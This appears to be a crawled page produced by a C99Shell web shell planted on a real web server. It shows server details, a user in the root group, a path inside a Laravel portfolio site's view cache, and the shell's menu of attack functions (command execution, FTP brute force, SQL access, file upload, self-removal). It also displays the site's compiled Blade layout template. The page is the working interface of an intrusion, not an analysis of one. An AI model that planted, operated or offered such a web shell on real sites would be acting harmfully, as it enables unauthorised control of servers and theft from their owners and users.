!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/portfolio2.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 29.29 GB of 117.98 GB (24.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     71618727fc8a7e93062b886559d904b2.php (7.88 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html>
<?php $siteDirection=isset(json_decode(get_settings('local_setting'))->direction)?json_decode(get_settings('local_setting'))->direction:'ltr';
?>
<html  class="no-js" lang="en" dir="<?php echo e($siteDirection); ?>">
<head>
    
    <?php echo $__env->yieldContent('css'); ?>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title><?php echo $__env->yieldContent('title'); ?> CodeC - Personal Portfolio Bootstrap5 Template </title>
    <link rel="icon" href="<?php echo e(asset('assets/img/icon.png')); ?>" type="image/gif" sizes="16x16">
    <link rel="icon" href="<?php echo e(asset('assets/img/icon.png')); ?>" type="image/gif" sizes="18x18">
    <link rel="icon" href="<?php echo e(asset('assets/img/icon.png')); ?>" type="image/gif" sizes="20x20">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/bootstrap.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/fontawesome.all.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/owl.carousel.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/owl.theme.default.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/magnific-popup.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/meanmenu.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/normalize.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('front/css/style.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/responsive.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('front/css/maicons.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('front/css/animate.css')); ?>">


</head>

<body>
<?php
    $home_slider_sections 
json_decode(get_settings('home_slider_section'), true);
    
$home_contact_us_section json_decode(get_settings('home_contact_us'));
?>
    <!-- Start Header Area -->
    <header class="header">
        <div class="container">
            <div class="row">
                <div class="col-lg-3">
                    <div class="logo">
                        <h2>
                            <a href="<?php echo e(route('home')); ?>"><?php echo e(get_settings('app_name')); ?></a>
                        </h2>
                    </div>
                    <div class="mobile-menu"></div>
                </div>
                <div class="col-lg-9">
                    <div class="menu">
                        <nav>
                            <ul>
                                <li class="current"><a href="<?php echo e(route('home')); ?>">Home</a></li>
                                <li><a href="#about">About</a></li>
                                <li><a href="#services">Research</a></li>
                                <li><a href="#resume">Teaching</a></li>
                                <li><a href="#portfolio">Calculator</a></li>
                                <li><a href="#blog">Publications</a></li>
                                <li><a href="#contact">Contact</a></li>
                            </ul>
                        </nav>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <!-- End Header Area -->

<?php echo $__env->yieldContent('main-section'); ?>

<footer class="footer">
    <div class="footer-top pt-70 pb-70">
        <div class="container">
            <div class="row">
                <div class="col-lg-3 col-md-6">
                    <div class="footer-widget-single">
                        <h2><?php echo e(get_settings('app_name')); ?></h2>
                        <p>Cras fermentum odio eu feugiat lide par naso tierra. Justo eget nada terra videa magna derita valies darta donna mare fermentum iaculis eu non diam phasellus. Scelerisque felis imperdiet proin fermentum leo. Amet volutpat consequat mauris nunc congue.</p>
                    </div>
                </div>
                <div class="col-lg-3 col-md-6">
                    <div class="footer-widget-single">
                        <h3>Useful Links</h3>
                        <ul>
                            <li><a href="#home">home</a></li>
                            <li><a href="#about">About us</a></li>
                            <li><a href="#">Services</a></li>
                            <li><a href="#">Terms of service</a></li>
                            <li><a href="#">Privacy policy</a></li>
                        </ul>
                    </div>
                </div>
                <div class="col-lg-3 col-md-6">
                    <div class="footer-widget-single">
                        <h3>Our Services</h3>
                        <ul>
                            <li><a href="#home">Photography</a></li>
                            <li><a href="#about">Web Design</a></li>
                            <li><a href="#">Woocommerce</a></li>
                            <li><a href="#">Brand Image</a></li>
                        </ul>
                    </div>
                </div>
                <div class="col-lg-3 col-md-6">
                    <div class="footer-widget-single">
                        <h3>Contact Us</h3>
                         <?php if(isset($home_contact_us_section->contact_us_address) && $home_contact_us_section->contact_us_address): ?>
                         <?php echo $home_contact_us_section->contact_us_address?>

                         <?php endif; ?>
                          <br>
                          <strong>Phone:</strong><?php echo e(isset($home_contact_us_section->contact_us_phone_number)?$home_contact_us_section->contact_us_phone_number:''); ?><br>
                          <strong>Email:</strong><?php echo e(isset($home_contact_us_section->contact_us_email)?$home_contact_us_section->contact_us_email:''); ?><br>
               
                        <ul class="social-link">
                            <li><a href="<?php echo e(isset($home_contact_us_section->facebook_link)?$home_contact_us_section->facebook_link:''); ?>" target="_blank"><i class="fab fa-facebook-f"></i></a></li>
                            <li><a href="<?php echo e(isset($home_contact_us_section->twitter_link)?$home_contact_us_section->twitter_link:''); ?>"  target="_blank"><i class="fab fa-twitter"></i></a></li>
                            <li><a href="<?php echo e(isset($home_contact_us_section->instagram_link)?$home_contact_us_section->instagram_link:''); ?>"  target="_blank"><i class="fab fa-instagram"></i></a></li>
                            <li><a href="<?php echo e(isset($home_contact_us_section->linkedin_link)?$home_contact_us_section->linkedin_link:''); ?>"  target="_blank"><i class="fab fa-linkedin"></i></a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="footer-bottom pt-25 pb-25 text-center section-bg">
        <p>@ Copyright <a href="#">CodexUnicTheme</a>  | All Rights Reserved</p>
    </div>
</footer>
    <!-- Js File -->
    <script src="<?php echo e(asset('assets/js/modernizr.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/jquery-3.6.0.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/popper.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/bootstrap.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/owl.carousel.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/jquery.nav.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/jquery.magnific-popup.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/mixitup.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/jquery.waypoints.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/jquery.counterup.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/jquery.meanmenu.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/script.js')); ?>"></script>
    <script src="<?php echo e(asset('front/js/wow.min.js')); ?>"></script>
    <script src="<?php echo e(asset('front/js/theme.js')); ?>"></script>

<?php echo $__env->yieldContent('js'); ?>

</body>
</html>
<?php /**PATH E:\protfolio backend 6-2-24\portfolio\resources\views/layouts/frontLayout.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--